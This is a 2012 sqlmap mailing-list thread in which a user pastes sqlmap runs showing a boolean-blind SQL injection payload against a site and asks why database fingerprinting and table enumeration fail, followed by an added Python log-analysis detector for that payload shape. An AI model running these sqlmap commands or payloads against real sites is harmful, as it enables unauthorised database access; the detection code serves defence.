Re: [sqlmap-users] Could not detect MS database injection
From: Miroslav S. <mir...@gm...> - 2012-12-15 17:59:05
Please send me privately the content of the traffic file for such a run (just append -t traffic.txt to a problematic run).

Kind regards,
Miroslav Stampar

On Dec 15, 2012 5:10 PM, "Volker Nebelung" <vol...@rw...> wrote:

> Hi,
>
> I am using sqlmap to scan a specific GET parameter of a target site. I know there is a SQL injection in parameter 2:
>
> python sqlmap.py -u "http://example.net/de/de*/site" --batch
>
> sqlmap gives me the following result:
>
> …
> [16:36:19] [INFO] heuristic test shows that URI parameter '#1*' might be injectable (possible DBMS: Microsoft Access)
> [16:36:19] [INFO] testing for SQL injection on URI parameter '#1*'
> [16:36:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
> [16:36:29] [INFO] URI parameter '#1*' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
> [16:36:29] [INFO] parsed error message(s) showed that the back-end DBMS could be Microsoft Access. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
> [16:36:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
> [16:36:29] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
> [16:37:05] [INFO] checking if the injection point on URI parameter '#1*' is a false positive
> [16:37:11] [INFO] URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
> sqlmap identified the following injection points with a total of 34 HTTP(s) requests:
> ---
> Place: URI
> Parameter: #1*
> Type: boolean-based blind
> Title: AND boolean-based blind - WHERE or HAVING clause
> Payload: http://example.net:80/de/de' AND 9199=9199 AND 'tyFW'='tyFW/site
> ---
> [16:37:11] [INFO] testing Microsoft Access
> [16:37:13] [INFO] confirming Microsoft Access
> [16:37:14] [WARNING] the back-end DBMS is not Microsoft Access
> [16:37:14] [INFO] testing MySQL
> [16:37:16] [WARNING] the back-end DBMS is not MySQL
> [16:37:16] [INFO] testing Oracle
> [16:37:17] [WARNING] the back-end DBMS is not Oracle
> [16:37:17] [INFO] testing PostgreSQL
> [16:37:18] [WARNING] the back-end DBMS is not PostgreSQL
> [16:37:18] [INFO] testing Microsoft SQL Server
> [16:37:19] [WARNING] the back-end DBMS is not Microsoft SQL Server
> [16:37:19] [INFO] testing SQLite
> [16:37:20] [WARNING] the back-end DBMS is not SQLite
> [16:37:20] [INFO] testing Firebird
> [16:37:21] [WARNING] the back-end DBMS is not Firebird
> [16:37:21] [INFO] testing SAP MaxDB
> [16:37:22] [WARNING] the back-end DBMS is not SAP MaxDB
> [16:37:22] [INFO] testing Sybase
> [16:37:23] [WARNING] the back-end DBMS is not Sybase
> [16:37:23] [INFO] testing IBM DB2
> [16:37:24] [WARNING] the back-end DBMS is not IBM DB2
> [16:37:24] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system, but from the HTML error page it was possible to determinate that the back-end DBMS is Microsoft Access. Do not specify the back-end DBMS manually, sqlmap will fingerprint the DBMS for you
> [16:37:24] [WARNING] HTTP error codes detected during testing:
> 400 (Bad Request) - 24 times, 500 (Internal Server Error) - 20 times
>
> [*] shutting down at 16:37:24
>
> I am confused at this point: Is sqlmap thinking that the DBMS is MS Access or not?
> When I manually try following URL in my browser "http://example.net/de/de'/site" I get a 500 HTML-page with output "Microsoft JET Database Engine Error …" so I would say the DBMS is MS Access.
> When I now try to get for example all tables, then following happens:
>
> python sqlmap.py -u "example.net/de/de*/site" --batch --tables
>
> sqlmap/1.0-dev-0664e72 - automatic SQL injection and database takeover tool
> http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 16:38:02
>
> [16:38:05] [INFO] custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
> [16:38:05] [INFO] testing connection to the target url
> sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
> ---
> Place: URI
> Parameter: #1*
> Type: boolean-based blind
> Title: AND boolean-based blind - WHERE or HAVING clause
> Payload: http://example.net:80/de/de' AND 9199=9199 AND 'tyFW'='tyFW/site
> ---
> [16:38:07] [INFO] testing MySQL
> [16:38:08] [INFO] heuristics detected web page charset 'ascii'
> [16:38:08] [WARNING] the back-end DBMS is not MySQL
> [16:38:08] [INFO] testing Oracle
> [16:38:09] [INFO] heuristics detected web page charset 'ISO-8859-2'
> [16:38:09] [WARNING] the back-end DBMS is not Oracle
> [16:38:09] [INFO] testing PostgreSQL
> [16:38:10] [WARNING] reflective value(s) found and filtering out
> [16:38:10] [WARNING] the back-end DBMS is not PostgreSQL
> [16:38:10] [INFO] testing Microsoft SQL Server
> [16:38:11] [WARNING] the back-end DBMS is not Microsoft SQL Server
> [16:38:11] [INFO] testing SQLite
> [16:38:12] [WARNING] the back-end DBMS is not SQLite
> [16:38:12] [INFO] testing Microsoft Access
> [16:38:12] [INFO] confirming Microsoft Access
> [16:38:13] [WARNING] the back-end DBMS is not Microsoft Access
> [16:38:13] [INFO] testing Firebird
> [16:38:14] [WARNING] the back-end DBMS is not Firebird
> [16:38:14] [INFO] testing SAP MaxDB
> [16:38:15] [WARNING] the back-end DBMS is not SAP MaxDB
> [16:38:15] [INFO] testing Sybase
> [16:38:16] [WARNING] the back-end DBMS is not Sybase
> [16:38:16] [INFO] testing IBM DB2
> [16:38:17] [WARNING] the back-end DBMS is not IBM DB2
> [16:38:17] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system. Support for this DBMS will be implemented at some point
> [16:38:17] [WARNING] HTTP error codes detected during testing:
> 400 (Bad Request) - 1 times, 500 (Internal Server Error) - 9 times
>
> [*] shutting down at 16:38:17
>
> Even when I try to use --text-only or --not-string switches I am not able to receive the tables. Any ideas?
>
> Best regards
>
> Volker Nebelung
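
Added example, not part of the original thread and not sqlmap code: how the run quoted above looks from the web server's side, as detection logic over access-log lines for the `' AND n=n AND 's'='s` payload shape and the single-quote probe. The log lines, client addresses, the false-condition value 4821 and the function names `classify`, `summarize` and `suspects` are constructed for illustration.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# Constructed access-log lines (combined format); clients, times and sizes are made up.
SAMPLE_LOG = """\
198.51.100.7 - - [15/Dec/2012:16:36:20 +0100] "GET /de/de%27%20AND%209199%3D9199%20AND%20%27tyFW%27%3D%27tyFW/site HTTP/1.1" 200 5120
198.51.100.7 - - [15/Dec/2012:16:36:21 +0100] "GET /de/de%27%20AND%209199%3D4821%20AND%20%27tyFW%27%3D%27tyFW/site HTTP/1.1" 500 812
203.0.113.9 - - [15/Dec/2012:16:36:25 +0100] "GET /de/de/site HTTP/1.1" 200 5120
198.51.100.7 - - [15/Dec/2012:16:36:26 +0100] "GET /de/de'/site HTTP/1.1" 500 790
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')
# A quote that closes the original string, then AND <int>=<int> as the boolean test.
BOOL_RE = re.compile(r"'\s*AND\s+(\d+)\s*=\s*(\d+)\b", re.IGNORECASE)

def classify(uri):
    """Label a request URI: bool-true, bool-false, quote-probe, or None."""
    decoded = unquote(uri)
    m = BOOL_RE.search(decoded)
    if m:
        return "bool-true" if m.group(1) == m.group(2) else "bool-false"
    if decoded.count("'") % 2 == 1:  # unbalanced quote, like the manual de'/site test
        return "quote-probe"
    return None

def summarize(log_text):
    """Per client: how many probes of each kind, and which 4xx/5xx they triggered."""
    clients = defaultdict(lambda: {"kinds": Counter(), "errors": Counter()})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, uri, status = m.groups()
        kind = classify(uri)
        if kind is None:
            continue
        clients[client]["kinds"][kind] += 1
        if int(status) >= 400:
            clients[client]["errors"][int(status)] += 1
    return dict(clients)

def suspects(summary):
    """Clients that sent both a true and a false condition: the boolean-blind pattern."""
    return sorted(c for c, e in summary.items()
                  if e["kinds"]["bool-true"] and e["kinds"]["bool-false"])

if __name__ == "__main__":
    report = summarize(SAMPLE_LOG)
    print(suspects(report), {c: dict(e["errors"]) for c, e in report.items()})
```

The per-client count of 400 and 500 responses corresponds to the "HTTP error codes detected during testing" line in the quoted output, which makes a burst of such errors on one path a useful second signal next to the payload match.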